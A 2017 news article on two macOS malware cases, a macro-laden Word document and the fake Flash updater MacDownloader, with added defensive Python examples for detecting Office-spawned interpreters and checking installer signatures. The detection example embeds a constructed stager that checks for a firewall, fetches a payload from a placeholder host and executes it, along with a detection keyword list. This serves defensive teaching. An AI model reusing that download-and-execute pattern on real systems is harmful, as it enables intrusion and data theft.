2 Malware Attacks Target Macs

Friday, February 10, 2017 @ 01:02 PM gHale

Researchers reported two separate instances of macOS malware this week: one relies on an old Windows technique, a malicious Office macro, and the other on a phony Flash Player update.

In the first case, a malicious Microsoft Word document that abuses macros, titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace,” was sent out.

When Mac users opened the document in a Word installation configured to allow macros and ignore warnings, the embedded macro first checked that the Little Snitch firewall wasn’t running, said Patrick Wardle, director of research at security firm Synack.

It then downloaded an encrypted payload, decrypted it with a hard-coded key and executed it. The macro code appears to have been taken from EmPyre, an open-source post-exploitation framework for Macs. By the time researchers found the document, the site the payload was downloaded from was no longer serving it, so it is impossible to say exactly what the second stage did.

Given how closely the code matched EmPyre, the malware could likely monitor webcams, steal passwords and encryption keys, and access browser history, the researcher said.
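The chain Wardle describes (Word runs a macro, the macro launches a downloader that checks for Little Snitch, fetches an encrypted payload and executes it) leaves a characteristic footprint in process-creation telemetry: an Office application spawning a scripting interpreter with inline, often base64-wrapped, code. The following is an added detection example, not the researchers' code or anything from EmPyre. It assumes records that carry a parent-process name and full command line (as an EDR or `ps -o ppid,comm,command` would give), that the stager takes the common EmPyre form of a `python -c` one-liner, and the event list, stage text and keyword list are constructed for illustration.

```python
"""Flag Office-spawned interpreter one-liners whose base64 argument decodes to
stager-like code.  Added example; event format, process names and keywords are
assumptions, not the researchers' indicators."""
import base64
import re
import shlex

OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}
INTERPRETERS = {"python", "python2", "python2.7", "python3", "osascript",
                "sh", "bash", "zsh", "perl", "curl"}
# Strings that tend to survive in an EmPyre-style stage once decoded:
# a network fetch, a decrypt-then-exec step and a security-tool check.
STAGE_KEYWORDS = ("urllib", "Little Snitch", "exec(", "decrypt",
                  "subprocess", "check_output")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def split_cmd(cmd):
    """Tokenise a command line; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def interpreter_of(cmd):
    """Basename of argv[0] if it is a scripting interpreter we care about."""
    argv = split_cmd(cmd)
    if not argv:
        return None
    exe = argv[0].rsplit("/", 1)[-1]
    return exe if exe in INTERPRETERS else None


def decode_embedded_b64(cmd):
    """Decode every long base64-looking token in the command line to text."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out.append(raw.decode("utf-8", errors="replace"))
    return out


def score_event(event):
    """Return an alert for one process-creation record, or None if nothing fires."""
    interp = interpreter_of(event["cmd"])
    if event["parent"] not in OFFICE_PARENTS or interp is None:
        return None
    reasons = [f"{event['parent']} spawned {interp}"]
    argv = split_cmd(event["cmd"])
    if "-c" in argv or "-e" in argv:
        reasons.append("inline code passed on the command line")
    hits = set()
    for text in decode_embedded_b64(event["cmd"]):
        hits.update(k for k in STAGE_KEYWORDS if k in text)
    if hits:
        reasons.append("base64 argument decodes to stager-like code")
    return {"parent": event["parent"], "interpreter": interp,
            "severity": "high" if hits else "medium",
            "reasons": reasons, "stage_keywords": sorted(hits)}


def scan(events):
    """Run score_event over a list of records and keep the alerts."""
    return [a for a in (score_event(e) for e in events) if a]


# Constructed stand-in for the stage the article describes (Little Snitch check,
# encrypted download, hard-coded key, exec).  Inert text used only as input:
# the host, KEY and decrypt() are placeholders and nothing here is executed.
STAGE_SRC = (
    "import subprocess,urllib2\n"
    "if 'Little Snitch' in subprocess.check_output(['ps','-ef']): raise SystemExit\n"
    "blob=urllib2.urlopen('http://stage.invalid/index.asp').read()\n"
    "exec(decrypt(KEY, blob))\n"
)
ONE_LINER = ('python -c "import sys,base64;exec(base64.b64decode(\'%s\'))"'
             % base64.b64encode(STAGE_SRC.encode()).decode())

# Constructed process-creation events (parent name, command line); not real captures.
SAMPLE_EVENTS = [
    {"parent": "Microsoft Word", "cmd": ONE_LINER},
    {"parent": "Microsoft Word", "cmd": "/usr/bin/open -a Safari https://example.invalid/"},
    {"parent": "Terminal", "cmd": 'python -c "import this"'},
    {"parent": "Microsoft Excel", "cmd": "/usr/bin/osascript -e 'display dialog \"hi\"'"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["interpreter"], alert["reasons"])
```

Run against the constructed events, the Word-spawned one-liner scores high because its base64 argument decodes to text containing the fetch, the Little Snitch check and an exec step, while Excel launching osascript with inline code scores medium on the parent/child relationship alone; a Terminal-spawned python and Word opening Safari produce nothing. Tune OFFICE_PARENTS and INTERPRETERS to the process names your telemetry actually reports.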

The other malware instance discovered this week also relied on a classic Windows tactic: faking a routine software update dialog that downloads malicious code rather than the update it claims to deliver. MacDownloader presented itself as an Adobe Flash Player update, the kind of prompt users see constantly. That is what the attackers were counting on: people either dismiss the updates or just click yes to make them go away once and for all.

Once a user clicked through the update, the malware could harvest the user’s keychain, search for usernames and passwords, and collect other private, sensitive data.

This was not an exploit of a software flaw; it relied entirely on people clicking a link to update Flash Player from a website and running the downloaded file.

The malware ended up discovered and analyzed by Claudio Guarnieri and Collin Anderson.

MacDownloader, which attackers disguised as a Flash Player update and as a Bitdefender adware removal tool, appears to have been created at the tail end of last year.
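MacDownloader’s delivery depended on a user running whatever a web page handed them. The practical control is to refuse to run a downloaded installer unless it carries a valid Developer ID signature from the vendor you expect. The following is an added example, not the researchers’ or Adobe’s code. It drives Apple’s codesign(1) and spctl(8) tools, so the live check runs only on macOS; the parsing and policy pieces are pure functions and run anywhere. EXPECTED_TEAM and the sample codesign output are constructed placeholders (look up the vendor’s actual Apple Developer Team ID before relying on this).

```python
"""Gate a downloaded "update" on its code signature before running it.
Added example.  EXPECTED_TEAM is a placeholder, not a real vendor's Team ID."""
import re
import subprocess

EXPECTED_TEAM = "ABCDE12345"  # placeholder; replace with the vendor's real Team ID
TEAM_LINE = re.compile(r"^TeamIdentifier=(.*)$", re.MULTILINE)


def team_id_from_codesign_output(text):
    """Pull the Team ID out of `codesign -dvv` output; None if unsigned or ad hoc."""
    m = TEAM_LINE.search(text)
    if not m:
        return None
    team = m.group(1).strip()
    return None if team in ("", "not set") else team


def decide(signature_ok, gatekeeper_ok, team, expected_team):
    """Policy: run only if the signature verifies, Gatekeeper accepts the binary
    and the signer is the team we expect.  Pure so it can be tested off-box."""
    if not signature_ok:
        return False, "signature missing or invalid"
    if not gatekeeper_ok:
        return False, "rejected by Gatekeeper policy (spctl)"
    if team != expected_team:
        return False, f"signed by team {team!r}, expected {expected_team!r}"
    return True, f"signed by expected team {team}"


def vet_installer(path, expected_team=EXPECTED_TEAM):
    """macOS only: run codesign/spctl against the file and apply decide()."""
    sig = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                         capture_output=True, text=True)
    gk = subprocess.run(["spctl", "--assess", "--type", "execute", path],
                        capture_output=True, text=True)
    info = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True)
    # codesign writes its -d report to stderr; join both streams to be safe.
    team = team_id_from_codesign_output(info.stderr + info.stdout)
    return decide(sig.returncode == 0, gk.returncode == 0, team, expected_team)


# Constructed samples of codesign -dvv output (paths and identifiers made up).
SAMPLE_SIGNED = """Executable=/Volumes/Installer/Install.app/Contents/MacOS/Install
Identifier=com.example.installer
Format=app bundle with Mach-O thin (x86_64)
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
"""
SAMPLE_ADHOC = """Executable=/Users/me/Downloads/FlashPlayer.app/Contents/MacOS/FlashPlayer
Identifier=FlashPlayer
Format=app bundle with Mach-O thin (x86_64)
Signature=adhoc
TeamIdentifier=not set
"""

if __name__ == "__main__":
    import sys
    ok, why = vet_installer(sys.argv[1])
    print(("OK: " if ok else "REFUSE: ") + why)
    sys.exit(0 if ok else 1)
```

An ad hoc or unsigned bundle, which is what a fake updater dropped by a web page typically is, reports `TeamIdentifier=not set` and is refused before any team comparison; a bundle signed by some other Developer ID account passes the signature and Gatekeeper checks but fails the team match, which is the check that a generic "is it signed?" test misses.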
